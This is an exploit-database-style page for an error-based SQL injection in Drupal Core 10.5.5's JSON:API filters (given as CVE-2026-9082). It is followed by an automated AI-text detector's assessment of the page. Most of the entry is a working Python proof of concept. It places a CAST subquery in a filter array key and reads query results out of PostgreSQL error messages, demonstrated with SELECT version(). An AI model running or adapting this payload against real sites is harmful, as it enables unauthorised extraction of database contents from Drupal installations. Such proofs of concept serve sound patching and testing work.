Skip to content
Chimera readability score 95 out of 100, Quantum Electrodynamics reading level.

Exploit Title: Drupal Core 10.5.5 - Error-Based SQL Injection

Google Dork: N/A

Date: 2026-05-31

Exploit Author: cardosource

Vendor Homepage: https://www.drupal.org

Software Link: https://www.drupal.org/project/drupal

Version: Drupal Core 10.5.5

Tested on: Debian Linux (Docker), PHP 8.2, Apache, PostgreSQL 17

CVE: CVE-2026-9082

#

Description:

This proof-of-concept demonstrates an Error-Based SQL Injection in

Drupal Core 10.5.5 (PostgreSQL). User-controlled JSON:API filter

array keys influence SQL query construction, allowing database

information disclosure through SQL error messages.

import requests

import json

from urllib.parse import urlencode

TARGET_URL = "http://localhost:8080/jsonapi/node/article"

BANNER = """

[+] Drupal Core 10.5.5 - Error-Based SQL Injection

[+] CVE-2026-9082

[+] Target: JSON:API (PostgreSQL)

"""

def extract_data(subquery):

headers = {

"Accept": "application/vnd.api+json",

"Content-Type": "application/vnd.api+json"

}

payload = f"0||CAST(({subquery}) AS INTEGER)"

params = {

"filter[my_filter][condition][path]": "title",

"filter[my_filter][condition][operator]": "IN",

"filter[my_filter][condition][value][0]": "Example",

f"filter[my_filter][condition][value][{payload}]": "Injection"

}

try:

response = requests.get(TARGET_URL, headers=headers, params=params, timeout=10)

if response.status_code == 500:

try:

error = response.json().get("errors", [{}])[0].get("detail", "")

if "invalid input syntax" in error:

data = error.split('"')[1] if '"' in error else error

print(f"\033[92m[SUCCESS]\033[0m {data}")

except json.JSONDecodeError:

pass

except requests.exceptions.RequestException:

pass

if __name__ == "__main__":

print(BANNER)

extract_data("SELECT version()")

Sentinel — Human

Confidence

The text exhibits the highly structured, efficient style of expert technical reporting, making it difficult to determine if it is generated by a human or an AI. The focus on precise details leans towards high-quality synthetic production but lacks clear stylistic AI markers.

Signals Detected
low severity: Mechanical and highly focused structure; absence of typical human variability (e.g., varied sentence length or hedging).
low severity: Perfect technical coherence; dense, fact-based presentation without any emotional framing or narrative padding.
medium severity: Follows a highly predictable template for vulnerability proof-of-concept reporting (CVE name, version, description, code demonstration).
Human Indicators
The use of specific, complex internal details related to a niche software stack and precise exploit steps suggests deep domain expertise.
The formatting strongly resembles technical report generation rather than conversational writing.